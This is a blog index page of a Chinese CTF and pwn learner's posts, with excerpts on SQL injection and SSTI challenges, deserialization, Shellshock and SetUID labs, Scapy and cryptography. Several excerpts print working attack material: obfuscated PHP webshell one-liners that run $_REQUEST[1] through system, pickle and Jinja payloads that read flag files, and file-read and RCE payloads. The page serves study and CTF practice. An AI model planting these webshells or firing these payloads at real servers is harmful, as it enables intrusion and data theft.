专注pwn0年-优快云博客

原创 lunaix-os环境配置

其他按照github项目来就行了。最后注释bochs的配置文件。再执行项目里面的脚本。

2023-01-01 19:46:17 241

原创改用语雀写博客

点击下面链接即可看笔记，感觉挺好的。太懒了，而且不喜欢优快云的水印。

2022-10-21 20:53:47 163

原创 CTFSHOW_SQL注入web249-253

试了其他文章的payload，没用成功，自己就写下来吧。做题有三点注意，url编码，加不加8080（有的脚本url里面加8080，如果不行就去掉，行就不管），用不用Burpsuite的Repeater（有的信息要用Repeater才能看见）

2022-08-19 20:41:42 322

原创 CTFSHOW_WEB入门web213

查了弄了好久才弄出来，PHPSESSID在F12储存里面找。下面是ctfshowweb213.py。

2022-08-07 17:14:55 1049

原创 Environment_Variable_and_SetUID

第一，euid和uid都为seed，LD_PRELOAD环境变量没有被忽略，所以链接的是libmylib.so.1.0.1，执行我们写的。第二个，euid为root，uid为seed，不相同，受动态链接器保护，执行正常的。将其设置为Set-UIDuser1程序，用seed用户执行，执行原本的。root的密码应该是seedubuntu，但是不对，所以我用。第四个，euid为uer1，uid为seed，不相同。第三个，euid等于uid，均为root。，前者会把数据当成命令执行，后者不会。...

2022-07-28 16:54:42 409

原创 Shellshock

在实验文件夹路径下执行下面命令，耐心等待，启动被攻击的网页程序。如果想关闭程序，在实验文件夹路径下执行下面命令。打开插件HTTPHeaderLive。不能，payload经过url编码也不行。，在VisualBox中创建虚拟机。-A修改User-Agent。让CGI使用有补丁的shell。攻击者用nc监听9090端口。执行失败，需要重复执行尝试。-A和-e可以进行数据注入。-e修改referer。执行下面命令找自己的ip。执行下面命令找服务器ip。然后修改成下面这个样子。的环境变量是可攻击的。......

2022-07-28 08:30:23 1122

原创 ucore概述（操作系统学习）

本文根据慕课资料进行粗略学习操作系统的知识ucore课程文档课程地址lab答案地址有的答案有问题，但是可以供参考CPU加电后会进行初始化，然后在内存读第一条指令。内存有一部分是ROM、一部分是RAM。断电后RAM信息会消失，但是ROM内容一直都在。读的第一个指令是CS:IP指向的地址（值应该是默认的），刚加电的CPU处于16位实模式下，寻址空间大小为2的20次方（1MB），CS、IP都是16位的。CS*16+IP（0xFFFF0）是第一条指令的地址，同时CS:IP要在2的20次方的寻址空间内。第一

2022-07-03 16:00:32 4597 1

原创 CTFWiki_PWN_LinuxPlatform_UserMode_Exploitation_StackOverflow_x86

先看这个文章学习函数调用栈出栈时RIP指向栈存放函数返回地址的位置，这个地址我们可以改为一个汇编指令的地址，RIP一直往后面指，以那个地址为起点一直往后执行把函数返回地址设为0804863A，会一直往后执行ret2shellcode把恶意汇编代码写到数组（代码块）里面，返回地址指向这个数组（代码块）首地址。这个数组要可读写执行，全局变量（.bss）有这个特点ljust() 用法shellcraft.sh() 打印结果计算偏移disass main反汇编 main 函数找到 main 的第一条指

2022-06-14 23:57:34 717

原创 2022/06/07Scapy

这个PyHook3还是非常难装的，用了作者提供的虚拟机环境测试结果是，在内网通信正常，当发给外网的服务器（接收端）丢包比较多。然后两种情况下监听端程序容易突然中断。这个大佬实现效果比较好，丢包率低。......

2022-06-07 19:01:30 280

原创 2022/06/04密码

这两个密码的分析，首先是根据字母出现的频率，结合上图进行猜测，多考虑两三个字母的组合频率，减少分析量。利用Kasiski测试法，搜索长度至少为三的相同的密文段，得到他们之间的距离。m（密钥长度）一般为距离的最小公倍数。然后用重合指数法进一步确定m文章中任意选取两个字母，设这两个字母相同的概率为pppi根据统计，26个字母的pppi2相加一般为0.065。维吉尼亚密码加密是通过Kasiski测试法得到密钥长度为m，密文元素第111个和第km+1km+1km+1是经过同一密钥处理的，我们照这样把经过同一

2022-06-04 21:12:35 337

原创 2022/06/04Scapy

HTTPS加密过程，这个网站讲的很清楚。我们进行HTTPS中间人攻击时，证书没被认证，浏览器会给客户端警告。在客户端点接受风险，才能继续攻击。或者控制客户端电脑认证我们的证书。利用mitmproxy先安装bcrypt，再安装paramiko要执行多个，只能在一行写，中间用分号隔开。然后我又改进了一下。把切换目录的命令保存在变量cd中，使用时可以正常用，感觉不错。...

2022-06-04 19:48:07 133

原创 2022/06/03密码

最简单的流密码是其密钥流直接由初始密钥使用特定算法变换得来，密钥流和明文串是相互独立的。这种类型的流密码称为同步流密码，正式定义如下：初始密钥为K\mathcal{K}K，通过g\mathcal{g}g生成密钥流L\mathcal{L}L，然后我们用L\mathcal{L}L中的密钥一个个加密。L\mathcal{L}L是有限集，zzzi是集合中的元素，zzzi和zzzj可以重复。它这个周期条件是ccci选择得当。因为上面是mod2mod2mod2，所以zzzi只有两种状态：0或者1，zzz总共m个

2022-06-04 00:17:44 147

原创 2022/06/03Scapy

DHCP数据包包括DHCP协议、BOOTP协议、UDP协议、IP协议、Ether协议，所以需要构造好这些。我们需要设置xid（事务ID，区分是否是自己发的包）、chaddr（和Ether协议的源MAC相同）

2022-06-03 20:53:30 106

原创 2022/06/02密码

一旦密钥被选定，每个字母对应的数字都被加密变换成对应的惟一的数字，这种密码体制称为单表代换密码。维吉尼亚密码是一种多表代换密码加密是把P\mathcal{P}P和K\mathcal{K}K中对应的元素相加，即pppi−k-k−ki解密相反P=C=(Z\mathcal{P}=\mathcal{C}=(\mathbb ZP=C=(Z26)))m为什么是Z\mathbb ZZ26m，因为可以表示多个组合，每个组合的每个元素都在一个Z\mathbb ZZ26中，前面的维吉尼亚密码也是这样的。P\math

2022-06-02 23:55:33 153

原创 2022/06/01密码

因为26=2×1326=2\times 1326=2×13，根据下文提到的欧拉函数ϕ(m)\phi(m)ϕ(m)计算得到所以与26互素的数的个数为12仿射密码的密钥空间等于a×ba\times ba×b定理1.2的证明我们计算一下ϕ(26)\phi(26)ϕ(26)因为26=2×1326=2\times 1326=2×13，ppp1=2=2=2，eee1=1=1=1，ppp2=13=13=13，eee2=1=1=1ϕ(26)=(p\phi(26)=(pϕ(26)=(p11−p-p−p11-1)(p

2022-06-02 13:15:43 126

原创 2022/06/01Scapy

filterfilter采用伯克利包过滤的方法，该方法有三种限定符：Type（对象，默认为host）、Dir（传输方向）、Proto（协议）。ifaceiface用来指定要使用的网卡，默认为上网使用的网卡

2022-06-01 22:09:13 240

原创 2022/06/01

今天上高数课刷b站，刷到cve-2022-30190复现的视频。自己就搜了一下资料主要是这两个改进后的poc和样本介绍。折腾很久，结果就是这个poc在很多版本都用不了，或者说这个漏洞局限性比较大。中间过程也看了样本介绍文章作者（研究员）的推文什么的，这个师傅的poc应该是根据研究员的poc改进得到的。实现攻击需要：服务器上提供一个html文件和给被攻击者一个word文件下面是html文件的关键开头这个是打开诊断疑难解答向导的协议类似的有打开pdf的协议html代码中间的经过base64编码

2022-06-01 21:34:23 204

原创 2022/05/31Scapy

ls()查看包的结构from scapy.all import *pkt = Ether()/IP()/TCP()ls(pkt)dst : DestMACField = 'ff:ff:ff:ff:ff:ff' ('None')src : SourceMACField = '00:00:00:00:00:00' ('None')type : XShortEnumFiel

2022-05-31 23:44:57 227

原创 2022/05/31密码

若 aaa 是 bbb 的倍数则记为 b ∣ ab\ |\ ab ∣ a一个比较不熟的定理若 a ∣ ba\ |\ ba ∣ b，b ∣ ab\ |\ ab ∣ a 则 a=±ba=\pm ba=±b欧几里得除法先证存在性，再证唯一性设q>q1q>q_{1}q>q1，如果r>r1r>r_{1}r>r1，那么a>aa>aa&gt

2022-05-31 17:37:17 204

原创 2022/05/30

ICMP隧道实验原文链接想做一下这个实验，网上也有工具实现，但是想自己编程工具链接看原文python代码中用了socket，但是我们用scapy模块实验一下现在用一下这个师傅的代码，不过有的地方要改一下才能运行。#!/usr/bin/env python3#被控端import osfrom scapy.all import *def main(): while True: # wait for the ICMP message containing the co

2022-05-30 21:47:06 127

原创 2022/05/28

telnet和ping的区别ping用来检测网络连接速度telnet用来探测指定IP的端口的端口是否开放Phar反序列化在Windows上测试<?phpclass Test{ public $cmd="system('notepad');";}$p = new Test();$phar = new Phar("test.phar");//后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __H

2022-05-28 12:10:43 214

原创 2022/05/26

<?php highlight_file(__FILE__); require_once('flag.php'); if(isset($_GET['file'])) { require_once($_GET['file']);}payload为http://www.yuxuanzhe.com/?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc.

2022-05-26 11:50:26 165

原创 2022/05/25

[CISCN2019 华北赛区 Day1 Web1]Dropbox<?phperror_reporting(0);$dbaddr = "127.0.0.1";$dbuser = "root";$dbpass = "root";$dbname = "dropbox";$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);class User { public $db; public function __constr

2022-05-25 10:48:21 126

原创 2022/05/24

基础免杀分析<?php$a = "s#y#s#t#e#m";$b = explode("#",$a);$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];$c($_REQUEST[1]);?><?php$a=substr('1s',1).'ystem';$a($_REQUEST[1]);?><?php$a=strrev('metsys');$a($_REQUEST[1]);?><?php$a=$_R

2022-05-24 00:00:08 82

原创 2022/05/23

[CISCN 2019华东南]Web4

2022-05-23 13:41:51 191

原创 2022/05/21

basename()函数返回路径中的文件名部分在使用默认语言环境设置时，basename() 会删除文件名开头的非 ASCII 字符。ascii值为47、128-255的字符均可以绕过basename()其中47对应的符号为’/'，在实际场景中没有利用价值那么也就是说我们可以利用一部分不可见字符来绕过basename()同时，在测试中也可以发现中文字符也是可以绕过basename()例如汉字、？、《、》、；等中文字符$_SERVER[’PHP_SELF’]http://www.exampl

2022-05-22 12:13:20 131

原创 2022/05/19

[CISCN2019 华北赛区 Day1 Web2]ikunapt-get install libssl-dev这一步出错了更新一下软件包就行了Python反序列化import pickleimport urllibclass payload(object): def __reduce__(self): return (eval, ("open('/flag.txt','r').read()",))a = pickle.dumps(payload())a = u

2022-05-19 19:16:38 154

原创 2022/05/18

WAFWAF是Web应用防火墙（Web Application Firewall）的简称WAF分为硬件WAF、软件WAF（ModSecurity）和代码级WAF。CC攻击DDoS是针对IP的攻击，而CC攻击的是网页。Syn Flood具体原理是：TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送SYN+ACK给客户端）并等待一段时间后丢弃

2022-05-18 18:17:30 221

原创 2022/05/17

[MRCTF2020]套娃Pwnhub五月公开赛wp学习1. TemplatePlay（模板注入）通过阅读jinja源码可以发现，jinja2内的undefined ，并非是python本身的而是自身修改过的并且继承自object，这样就可以直接使用此对象查找魔术方法，构造利用链。ads就是未定义的，未定义就可以很灵活{{ads.__init__.__globals__.__builtins__.__import__("os").popen("cat+config/flag.txt").read(

2022-05-17 20:37:59 2440

原创 2022/05/16

Tor代理tor网络使用多层代理，每间隔十分钟会换一次代理，能够更好的匿名访问网络防止禁IPProxyChains-NG可以通过ProxyChains-NG实现终端下任意应用代理比如Tor和Nmap

2022-05-16 16:20:53 90

原创 2022/05/10学习us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

初步学习url中如果有Unicode字符会将他们转换为ASCII在这个过程中可能会出现问题https://evil.c℀.Example.com会转化为https://evil.ca/c.Example.com重点是Example.com变成了一个目录或者文件可以利用这一点做到一些事情原pdf资料2019black hat一个议题...

2022-05-10 23:02:54 71

原创 2022/05/08无参数RCE

cmd=echo(show_source(end(scandir(next(str_split(zend_version()))))));

2022-05-08 19:51:44 104

原创 2022/05/03

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3

2022-05-03 18:26:56 93

空空如也

空空如也